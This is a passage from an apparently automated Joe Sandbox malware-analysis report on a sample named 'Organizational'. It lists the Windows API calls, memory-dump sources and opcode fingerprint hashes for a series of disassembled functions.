                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00F7DDBB
                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00F7DDDC
                                                    • ShowWindow.USER32(00000003,00000000), ref: 00F7DDFB
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00F7DE20
                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 00F7DE43
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                    • String ID:
                                                    • API String ID: 1211466189-0
                                                    • Opcode ID: d020839b6f36141f4583b9bb84318ed3e16f333913e8bcddf819317b733cdfe1
                                                    • Instruction ID: c31f7020cdf622ab9cfa5aaadc3e7dc4ca1623a99b475089e01798d01d275253
                                                    • Opcode Fuzzy Hash: d020839b6f36141f4583b9bb84318ed3e16f333913e8bcddf819317b733cdfe1
                                                    • Instruction Fuzzy Hash: 42B18831A00219ABDF15CF69C985BBD7BB1BF44710F48C06AEC489E295D770A950EBA1
                                                    APIs
                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                      • Part of subcall function 00F7147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F7040D,?,?), ref: 00F71491
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F7044E
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: BuffCharConnectRegistryUpper_memmove
                                                    • String ID:
                                                    • API String ID: 3479070676-0
                                                    • Opcode ID: 7237bdb2ff49e8820d56b53fe70524e91cac615766db98403d162f6547406d6b
                                                    • Instruction ID: 5324aaf3a18397b8584fbbb8dc0aa0032c58389e9c34125059f504cc2d5be706
                                                    • Opcode Fuzzy Hash: 7237bdb2ff49e8820d56b53fe70524e91cac615766db98403d162f6547406d6b
                                                    • Instruction Fuzzy Hash: 81A17971204205DFCB10EF24CC91F6EBBE5AF84314F04891DF99A972A2DB35E945EB42
                                                    APIs
                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00F2C508,00000004,00000000,00000000,00000000), ref: 00EF2E9F
                                                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00F2C508,00000004,00000000,00000000,00000000,000000FF), ref: 00EF2EE7
                                                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00F2C508,00000004,00000000,00000000,00000000), ref: 00F2C55B
                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00F2C508,00000004,00000000,00000000,00000000), ref: 00F2C5C7
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ShowWindow
                                                    • String ID:
                                                    • API String ID: 1268545403-0
                                                    • Opcode ID: 904e7d9373c4c29c771a9893b044a6f3afc12edcb5ce408bbd2b27efd96e14bc
                                                    • Instruction ID: 3d1f07b403ea530a1780378ca5fbf93258c7c1b1a60ca5050389aa5f9993024a
                                                    • Opcode Fuzzy Hash: 904e7d9373c4c29c771a9893b044a6f3afc12edcb5ce408bbd2b27efd96e14bc
                                                    • Instruction Fuzzy Hash: B441283160468C9AC7368B28DC887BE7B92BB85314F78A40EE747675A0CB75F840EB51
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 00F57698
                                                      • Part of subcall function 00F10FE6: std::exception::exception.LIBCMT ref: 00F1101C
                                                      • Part of subcall function 00F10FE6: __CxxThrowException@8.LIBCMT ref: 00F11031
                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00F576CF
                                                    • EnterCriticalSection.KERNEL32(?), ref: 00F576EB
                                                    • _memmove.LIBCMT ref: 00F57739
                                                    • _memmove.LIBCMT ref: 00F57756
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00F57765
                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00F5777A
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F57799
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 256516436-0
                                                    • Opcode ID: dfb4d10943dc6f26778c1a3cab89fe1aad298bce51c073624a8432d9b25db828
                                                    • Instruction ID: f4a9ffa7ff836dad0f2a8aa99080c23f30e78edd33bca92dc5704fe590b122f9
                                                    • Opcode Fuzzy Hash: dfb4d10943dc6f26778c1a3cab89fe1aad298bce51c073624a8432d9b25db828
                                                    • Instruction Fuzzy Hash: 1B31B271904208EBCB50EF54EC85EAEB7B8FF49310F1440A5FE04AB246DB749E54EBA0
                                                    APIs
                                                    • DeleteObject.GDI32(00000000), ref: 00F76810
                                                    • GetDC.USER32(00000000), ref: 00F76818
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F76823
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00F7682F
                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00F7686B
                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F7687C
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00F7964F,?,?,000000FF,00000000,?,000000FF,?), ref: 00F768B6
                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00F768D6
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                    • String ID:
                                                    • API String ID: 3864802216-0
                                                    • Opcode ID: 5fa5c0902ac91b23bd8f2350d1ce6c6cd805efe5175fe2cee525e5fceff9f165
                                                    • Instruction ID: f07ec3624ff58dd5dd13be77879c7fac2554ac184038a6c2a96a10b01b6d8592
                                                    • Opcode Fuzzy Hash: 5fa5c0902ac91b23bd8f2350d1ce6c6cd805efe5175fe2cee525e5fceff9f165
                                                    • Instruction Fuzzy Hash: FE318B72201614BFEB108F10CC8AFFA3BA9EF49761F044065FE08EA291DB759855DBB5
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _memcmp
                                                    • String ID:
                                                    • API String ID: 2931989736-0
                                                    • Opcode ID: e3f290ec29582d80ff5ea5feeba385d259e67d52cad46f888fdbba9d2a54f212
                                                    • Instruction ID: bb42de508c2b8ce3382c0bbb9a2d06b0edb2ab54cbffb23c88e32af1d5935bd0
                                                    • Opcode Fuzzy Hash: e3f290ec29582d80ff5ea5feeba385d259e67d52cad46f888fdbba9d2a54f212
                                                    • Instruction Fuzzy Hash: 9021F973B022057BD65475118D82FEB3FACAE11BA4F085020FE06A6352F715DE11F6E6
                                                    APIs
                                                      • Part of subcall function 00EF4D37: __itow.LIBCMT ref: 00EF4D62
                                                      • Part of subcall function 00EF4D37: __swprintf.LIBCMT ref: 00EF4DAC
                                                      • Part of subcall function 00F0436A: _wcscpy.LIBCMT ref: 00F0438D
                                                    • _wcstok.LIBCMT ref: 00F5F2D7
                                                    • _wcscpy.LIBCMT ref: 00F5F366
                                                    • _memset.LIBCMT ref: 00F5F399
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                    • String ID: X
                                                    • API String ID: 774024439-3081909835
                                                    • Opcode ID: 7979c7cc7a2cf7cf6303107ac22df1b2cef662566d62c280aefb722c2c1432ee
                                                    • Instruction ID: c9c51a8e176a880bca7a8b8778b490fe3438c1637208e14375217fc03933a844
                                                    • Opcode Fuzzy Hash: 7979c7cc7a2cf7cf6303107ac22df1b2cef662566d62c280aefb722c2c1432ee
                                                    • Instruction Fuzzy Hash: A3C19F716043409FD714EF24C881A6FB7E4BF85350F04496DFA99972A2DB34EC49EB82
                                                    APIs
                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00F672EB
                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00F6730C
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F6731F
                                                    • htons.WSOCK32(?,?,?,00000000,?), ref: 00F673D5
                                                    • inet_ntoa.WSOCK32(?), ref: 00F67392
                                                      • Part of subcall function 00F4B4EA: _strlen.LIBCMT ref: 00F4B4F4
                                                      • Part of subcall function 00F4B4EA: _memmove.LIBCMT ref: 00F4B516
                                                    • _strlen.LIBCMT ref: 00F6742F
                                                    • _memmove.LIBCMT ref: 00F67498
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                    • String ID:
                                                    • API String ID: 3619996494-0
                                                    • Opcode ID: 98db580e93876fcce201a3f27194f050a8477d1eacbe706c77bfac49d4dbdcd3
                                                    • Instruction ID: bc8fcfc5871c47ca629c17a348cb0bec18b4463afa1fc235bf1dd0fbf4941715
                                                    • Opcode Fuzzy Hash: 98db580e93876fcce201a3f27194f050a8477d1eacbe706c77bfac49d4dbdcd3
                                                    • Instruction Fuzzy Hash: 7F81B172608304ABD310EB24CC95E6BB7E8AF84714F10451CFA56AB2D2DF74DD45DB91
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1331b6aa5a82c5a4d586f39ec770164d368bbffdd1d06bd448f6e6d9d4d950a5
                                                    • Instruction ID: 2beaf57c45562326c74dfe8c2e51108c193ca978daa2a0de0fde316cfd293718
                                                    • Opcode Fuzzy Hash: 1331b6aa5a82c5a4d586f39ec770164d368bbffdd1d06bd448f6e6d9d4d950a5
                                                    • Instruction Fuzzy Hash: A3714C3090014DEFCB08DF59CD49AFEBBB5FF86324F148199EA15AA251C7349A51DFA0
                                                    APIs
                                                    • IsWindow.USER32(01464A90), ref: 00F7BA5D
                                                    • IsWindowEnabled.USER32(01464A90), ref: 00F7BA69
                                                    • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00F7BB4D
                                                    • SendMessageW.USER32(01464A90,000000B0,?,?), ref: 00F7BB84
                                                    • IsDlgButtonChecked.USER32(?,?), ref: 00F7BBC1
                                                    • GetWindowLongW.USER32(01464A90,000000EC), ref: 00F7BBE3
                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00F7BBFB
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                    • String ID:
                                                    • API String ID: 4072528602-0
                                                    • Opcode ID: 014744c1cb766cd948195a3b43b98850db1d8fbe68127cc325d69a5127a1442d
                                                    • Instruction ID: 709cca0ea8c72ee14e6369088172ed9fea1b938b48acabfd0ac696567bdc4fba
                                                    • Opcode Fuzzy Hash: 014744c1cb766cd948195a3b43b98850db1d8fbe68127cc325d69a5127a1442d
                                                    • Instruction Fuzzy Hash: 35718034A04205AFEB25AF54C8D4FFA77A5EF8A320F14805AFD4997251CB35AC50FB52
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F6FB31
                                                    • _memset.LIBCMT ref: 00F6FBFA
                                                    • ShellExecuteExW.SHELL32(?), ref: 00F6FC3F
                                                      • Part of subcall function 00EF4D37: __itow.LIBCMT ref: 00EF4D62
                                                      • Part of subcall function 00EF4D37: __swprintf.LIBCMT ref: 00EF4DAC
                                                      • Part of subcall function 00F0436A: _wcscpy.LIBCMT ref: 00F0438D
                                                    • GetProcessId.KERNEL32(00000000), ref: 00F6FCB6
                                                    • CloseHandle.KERNEL32(00000000), ref: 00F6FCE5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                    • String ID: @
                                                    • API String ID: 3522835683-2766056989
                                                    • Opcode ID: 6d23804e2862fe582e38997ab4ca6403ee4e932b51a633fa9325f72d1c4f323a
                                                    • Instruction ID: 4c8bf1341c6ff6a680067d41703639cdbf9701d1ca7d0735e6602c32519893d3
                                                    • Opcode Fuzzy Hash: 6d23804e2862fe582e38997ab4ca6403ee4e932b51a633fa9325f72d1c4f323a
                                                    • Instruction Fuzzy Hash: 8361DFB5A00619DFCB14EF94D8909AEB7F4FF48310F108469E906BB391CB35AE45EB90
                                                    APIs
                                                    • GetParent.USER32(?), ref: 00F5178B
                                                    • GetKeyboardState.USER32(?), ref: 00F517A0
                                                    • SetKeyboardState.USER32(?), ref: 00F51801
                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00F5182F
                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00F5184E
                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00F51894
                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F518B7
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: bdf18f27c1b31f4d3705923af174381d3bfb2fed6177cefde4d2ec58a4d1ff95
                                                    • Instruction ID: aa97f281ef3a79d34f915222394341ada83eee5a4308103fe1aa3f97bb102020
                                                    • Opcode Fuzzy Hash: bdf18f27c1b31f4d3705923af174381d3bfb2fed6177cefde4d2ec58a4d1ff95
                                                    • Instruction Fuzzy Hash: 7F51D360A047D53DFB364228CC55BB67EE97B06316F088589EAD5458C2D698BC8CE750
                                                    APIs
                                                    • GetParent.USER32(00000000), ref: 00F515A4
                                                    • GetKeyboardState.USER32(?), ref: 00F515B9
                                                    • SetKeyboardState.USER32(?), ref: 00F5161A
                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00F51646
                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00F51663
                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00F516A7
                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00F516C8
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: abde03f109f4bf9d71fe481a4e202bc3e66b4f139a6df989f8ed7ae749fcea08
                                                    • Instruction ID: d285c79b89b250a9e5f5f392232abbf1002ec8465baeb4ba3fb1a8c284950950
                                                    • Opcode Fuzzy Hash: abde03f109f4bf9d71fe481a4e202bc3e66b4f139a6df989f8ed7ae749fcea08
                                                    • Instruction Fuzzy Hash: DA5103A0A047D53DFB3283248C45BBA7EA97B46312F0C4589EAD5468C2D7A8FC9CF750
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _wcsncpy$LocalTime
                                                    • String ID:
                                                    • API String ID: 2945705084-0
                                                    • Opcode ID: 7ddd32d31fcaf75b9e9befc312b2b3c0832c40b41d0ed59bea1c93a06e254b0b
                                                    • Instruction ID: 9571ec3390ec45463b3da53b5d8f012f6f0ea7de5441f3e3fb4d5a0ea06ec0b9
                                                    • Opcode Fuzzy Hash: 7ddd32d31fcaf75b9e9befc312b2b3c0832c40b41d0ed59bea1c93a06e254b0b
                                                    • Instruction Fuzzy Hash: EC419076C1061875CB51FBF4CC4A9CFB3B8AF04311F518856E909E3221E738A3A9D3A6
                                                    APIs
                                                      • Part of subcall function 00F54BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F53B8A,?), ref: 00F54BE0
                                                      • Part of subcall function 00F54BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F53B8A,?), ref: 00F54BF9
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00F53BAA
                                                    • _wcscmp.LIBCMT ref: 00F53BC6
                                                    • MoveFileW.KERNEL32(?,?), ref: 00F53BDE
                                                    • _wcscat.LIBCMT ref: 00F53C26
                                                    • SHFileOperationW.SHELL32(?), ref: 00F53C92
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                    • String ID: \*.*
                                                    • API String ID: 1377345388-1173974218
                                                    • Opcode ID: b825bbfa6a26a2fa344a4364580fbdc206233bd65f41a57ecff50b429a13e601
                                                    • Instruction ID: 9ec7cba2e7d19e38341ff29cc6463f3da6961f8b5c3bde3f4dba693b86989dad
                                                    • Opcode Fuzzy Hash: b825bbfa6a26a2fa344a4364580fbdc206233bd65f41a57ecff50b429a13e601
                                                    • Instruction Fuzzy Hash: 6941847250C344AAC751EF68D845ADBB7ECAF89391F40092EF989C3151EB38D68CE752
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F778CF
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F77976
                                                    • IsMenu.USER32(?), ref: 00F7798E
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F779D6
                                                    • DrawMenuBar.USER32 ref: 00F779E9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
